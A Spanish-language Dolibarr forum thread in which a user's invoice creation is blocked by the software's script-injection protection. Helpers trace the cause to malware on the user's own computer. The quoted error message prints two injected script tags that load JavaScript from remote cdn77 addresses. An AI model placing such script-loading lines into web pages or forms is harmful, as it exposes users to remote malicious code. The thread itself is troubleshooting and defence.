dolibarr.es

Hola,

Desde hace unas semanas, no recuerdo si tras la actualización a la versión 9 o antes, me ha aparecido un error de SQL al tratar de crear una factura a un cliente, ya sea desde la sección "Financiera" o desde la ficha del cliente, el error es el mismo y es de inyección de SQL...

"Access refused by SQL/Script injection protection in main.inc.php (type=0 key=note_public value=<br /> <script async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js"></script> <script src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js"></script> page=/htdocs/compta/facture/card.php)"

Lo tengo instalado en una máquina propia, la primera vez que me salió acabé por hacer backup y llevarlo a otra máquina donde ha funcionado sin problemas una semana aprox, y ahora me encuentro otra vez el mismo problema. Da igual que acceda desde el exterior por nombre de dominio que a través de la ip interna de la máquina, al querer crear la factura me aparece el error.

Necesito encontrar la solución definitiva a esto, no puedo estar migrando todo cada semana a máquinas distintas.

Muchas gracias

Hola,

en el mensaje de error pone algo de la nota pública. ¿Estás indicando algo en la nota pública cuando creas la factura? Tal vez haciendo copia-pega se está rellenando ahí algo raro.

Un saludo.

No nada lo dejo en blanco... escojo cliente, pongo fecha y método de cobro y al ir al borrador (todavía sin incluir nada) es cuando me aparece el error

Hola,

pues Dolibarr está detectando que en el campo nota pública se le está enviando lo siguiente Lo interpreta como algo malicioso y es lo que hace dar el error.

Un saludo.

Cierto, si miro la nota pública y la privada como HTML aparece dicho código... si lo borro me permite continuar. Ahora he tirado adelante, voy a incluir una linea de producto y me dice lo mismo pero en la descripción y efectivamente si la miro como html vuelve a estar ese código incrustado ahí... Eso puede deberse a algun ataque o es un error de la instalación?

He hecho búsquedas en la bbdd con las cadenas que suelta de la url 1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js y no encuentro nada. En los ficheros conf.php y main.inc.php tampoco. En Dolibarr en cualquier cuadro de texto, si lo miro como html, aparece; en la configuración del módulo de facturas tengo un texto libre puesto, ahí aparece, lo borro, le doy a guardar y vuelve a aparecer; si genero factura aparece en la nota pública, en la privada y en la descripción; al crear un presupuesto igual; en los pedidos... No sé donde más buscar para eliminarlo...

Gracias

Hola. Se me ocurre, desde un celular, crear una factura, y ver si tambien se genera ese texto raro.
Por si el problema esta en la maquina cliente.

Saludos,
Eduardo.

JODER! Totalmente cierto... desde el móvil no aparece nada de ello. En casa de herrero cuchara de palo ostia! Ahora mismo estoy empezando a pasar programas de limpieza de malware y demás mierdas!

Gracias a los dos por la ayuda!

Si, hay que estar muy atento a todo, la web publica es una zona de peligro llena de zombies jaja.

Saludos,
Eduardo.